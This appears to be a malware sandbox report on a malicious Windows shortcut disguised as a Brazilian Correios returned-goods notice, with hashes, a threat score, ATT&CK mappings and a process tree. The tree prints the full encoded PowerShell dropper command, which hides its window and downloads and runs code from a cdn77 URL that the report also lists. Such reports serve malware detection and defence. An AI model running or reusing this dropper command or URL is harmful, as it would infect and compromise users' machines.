b82b79181cdd7422ac575c5e23f7df3e4ec3cf4181e1dd9ae4bf6ec4b8358cb8

General

Target

Mercadoria_Devolvida-Correios-1SU3RI8J.lnk
Size

3KB
MD5

246e74b6fffb9d5994f7f70bb6509b45
SHA1

4b7bdf4808ce987b9f94ea40bdd081217867483a
SHA256

0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
SHA512

178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2712	powershell.exe
6	2712	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2712	powershell.exe
2712	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2712	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2356 wrote to memory of 2712	2356	cmd.exe	31
PID 2356 wrote to memory of 2712	2356	cmd.exe	31
PID 2356 wrote to memory of 2712	2356	cmd.exe	31
PID 2712 wrote to memory of 2988	2712	powershell.exe	32
PID 2712 wrote to memory of 2988	2712	powershell.exe	32
PID 2712 wrote to memory of 2988	2712	powershell.exe	32
PID 2988 wrote to memory of 2620	2988	csc.exe	33
PID 2988 wrote to memory of 2620	2988	csc.exe	33
PID 2988 wrote to memory of 2620	2988	csc.exe	33

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-1SU3RI8J.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2356
- C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2712
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\6l9lcnmq.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2988
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD09.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBD08.tmp"
      4⤵
      PID:2620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6l9lcnmq.dll

Filesize
3KB

MD5
4a1e1e784af32ed85967e6cf7f0f1669

SHA1
e234ab60bdef44cc1e23dbf7d50fbe728f53c52c

SHA256
0827492738181a800bb6e967d5a9cb69cfa1145b6bb0e7b31d75b6878dc5b7ed

SHA512
1e3b3eee6d49a9e605dcff6003373cf02bdaf7aeb72d332eafc92cc59a1f8808cb4f4bda715cab5ddab4a3e1f545b9d1838d8fa0f776e9a138789b4a852f7c95

Download Submit
C:\Users\Admin\AppData\Local\Temp\6l9lcnmq.pdb

Filesize
7KB

MD5
f0c0e8bdecbc42a33496c36c03842526

SHA1
dc882ef500945f06c40103e829e97929c01c3e24

SHA256
ab28a626c4c6646066a7a13bc643276c55dd99d9325e289d1d1aa135df3974f9

SHA512
2d85ef83c2674cf390af37cadf527fb640ae4d484565d954b97ee6bbc240655cf61afc254ebf35eb1b1a5973d1b039d9aca2ce3a3e5458faa51b7d104ec3bbc6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBD09.tmp

Filesize
1KB

MD5
136f243e02d26911df44f2047232f990

SHA1
eb55ae9035d27f311d47bd73858d2915cea8ddac

SHA256
696cfad4dae8e11915d5c5594cf1fafbf1c22d2b6d4888fcab4550af3b5bf344

SHA512
246658c13c341195a1b33cb9741243a6d3cec36bbc430782dab6e8fcec4392a2ee500b873e8e34a0fc140cb7ad385d46136f53eef0af2f756bed06c7c874c44c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\6l9lcnmq.0.cs

Filesize
187B

MD5
7b0e7177dfbb9edd1c1ef08b4fdfae2f

SHA1
cb11a0252cdad66ec247312ccb7feb46456e52b6

SHA256
6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa

SHA512
7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\6l9lcnmq.cmdline

Filesize
309B

MD5
68e456b722471ae7cc3a083fd2ed406c

SHA1
a5d93dff7d46c05ea066162f5ee241ddb42d4672

SHA256
279687ccc79bca480fea25702d6bfa99c1e6b156262af1ff0f1021b06268fdc6

SHA512
42e25c65726879441b1755bad32c7da6078f7676bc0987445668095b2ea81f4ba5399bdc983825a5b9cf58cde082917e58ba6b0f61fb9f1920509d1886742b6e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCBD08.tmp

Filesize
652B

MD5
cc8f0e34f571cf5321817ab7af219c26

SHA1
a01e08ee7c39970d68ef798fb400f9499b82d960

SHA256
cda326a4f40e91a6e95f7bbc2f6d922b55cd09f0dc6daa20ad91df16cacc8eb8

SHA512
962d7a507bdd2ff077dd326550ca905a2eea9ed3fa88acb9613eaa986931bf60da49cda08280ada98f63fd59ff95382f4ab8b58e3e305ba74efb5516190a9449

Download Submit
memory/2712-45-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-46-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-38-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

Filesize
4KB

Download
memory/2712-40-0x0000000002380000-0x0000000002388000-memory.dmp

Filesize
32KB

Download
memory/2712-56-0x0000000002D60000-0x0000000002D68000-memory.dmp

Filesize
32KB

Download
memory/2712-39-0x000000001B610000-0x000000001B8F2000-memory.dmp

Filesize
2.9MB

Download
memory/2712-59-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing